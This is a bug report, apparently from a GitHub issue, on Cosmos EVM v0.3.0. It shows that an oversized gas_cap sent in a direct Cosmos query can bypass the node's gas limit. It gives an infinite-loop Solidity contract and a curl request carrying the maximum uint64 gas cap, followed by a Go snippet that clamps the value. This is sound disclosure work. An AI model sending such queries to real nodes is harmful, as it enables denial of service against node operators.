Open
Description
Is there an existing issue for this?
- I have searched the existing issues
What happened?
Currently, an attacker can bypass the gas cap by querying directly at the Cosmos level and specifying a very large gas cap.
If done in a malicious way, an attacker could use a high GasCap to execute an infinite loop function, potentially impacting node performance and crashing the node.
Cosmos EVM Version
v0.3.0
How to reproduce?
Steps to reproduce
Deploy
```solidity
// SPDX-License-Identifier: MIT
pragma solidity =0.8.6;

contract InfiniteLoop {
    uint256 public count;

    constructor() {
        count = 0;
    }

    function infiniteLoop() public {
        while (true) {
            count++;
            // This will cause an out-of-gas error if called
            // in a transaction, but will not revert the contract.
            // It will just keep incrementing `count`.
        }
    }

    function getCount() public view returns (uint256) {
        return count;
    }
}
```
Call
```sh
curl http://localhost:1317/cosmos/evm/vm/v1/eth_call\?args\=eyJmcm9tIjogIjB4QzZGZTVEMzM2MTVhMUM1MmMwODAxOGM0N0U4QmM1MzY0NkEwRTEwMSIsICJ0byI6ICIweDNENjQxYTI3OTE1MzNCNEEwMDAwMzQ1ZUE4ZDUwOWQwMUUxZWMzMDEiLCJkYXRhIjogIjB4MWRiZjM1M2QifQ==\&gas_cap\=18446744073709551615
```
The base64-decoded value of `args` is `{"from": "0xC6Fe5D33615a1C52c08018c47E8Bc53646A0E101", "to": "0x3D641a2791533B4A0000345eA8d509d01E1ec301","data": "0x1dbf353d"}`, where `from` is the address of user1, `to` is the address of the deployed contract, and `data` is the signature of the `infiniteLoop()` function.
Change the `to` address to the address of the deployed smart contract during testing if it changes in your setup.
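One way a node could refuse to honour an oversized caller-supplied `gas_cap`, added here as an example and not taken from the issue or from the Cosmos EVM code base. The names `nodeGasCap`, `callArgs`, `sampleQuery` and `sanitize` are hypothetical, the ceiling value is constructed, and the sample request is built inline rather than copied from the report.

```go
package main

import (
	"encoding/base64"
	"encoding/json"
	"fmt"
	"net/url"
	"strconv"
)

// nodeGasCap is an assumed operator-side ceiling (constructed value).
const nodeGasCap uint64 = 25_000_000
type callArgs struct{ From, To, Data string } // fields shown in the issue's decoded args

// effectiveGasCap honours the caller's value only when it is non-zero and within the ceiling.
func effectiveGasCap(requested, ceiling uint64) uint64 {
	if requested == 0 || requested > ceiling {
		return ceiling
	}
	return requested
}

// sampleQuery builds a constructed request shaped like the one in the issue.
func sampleQuery(argsJSON, gasCap string) url.Values {
	return url.Values{"args": {base64.StdEncoding.EncodeToString([]byte(argsJSON))}, "gas_cap": {gasCap}}
}

// sanitize (hypothetical helper) decodes args and clamps gas_cap to the node's ceiling.
func sanitize(q url.Values, ceiling uint64) (callArgs, uint64, error) {
	var args callArgs
	blob, err := base64.StdEncoding.DecodeString(q.Get("args"))
	if err != nil {
		return args, 0, fmt.Errorf("args base64: %w", err)
	}
	if err = json.Unmarshal(blob, &args); err != nil {
		return args, 0, fmt.Errorf("args JSON: %w", err)
	}
	var requested uint64
	if s := q.Get("gas_cap"); s != "" {
		if requested, err = strconv.ParseUint(s, 10, 64); err != nil {
			return args, 0, fmt.Errorf("gas_cap: %w", err)
		}
	}
	return args, effectiveGasCap(requested, ceiling), nil
}

func main() {
	fmt.Println(sanitize(sampleQuery(`{"data":"0x1dbf353d"}`, "18446744073709551615"), nodeGasCap))
}
```

With the clamp in place, the maximum `uint64` value from the report resolves to the node's ceiling, so the looping call stops with out-of-gas at a bounded cost.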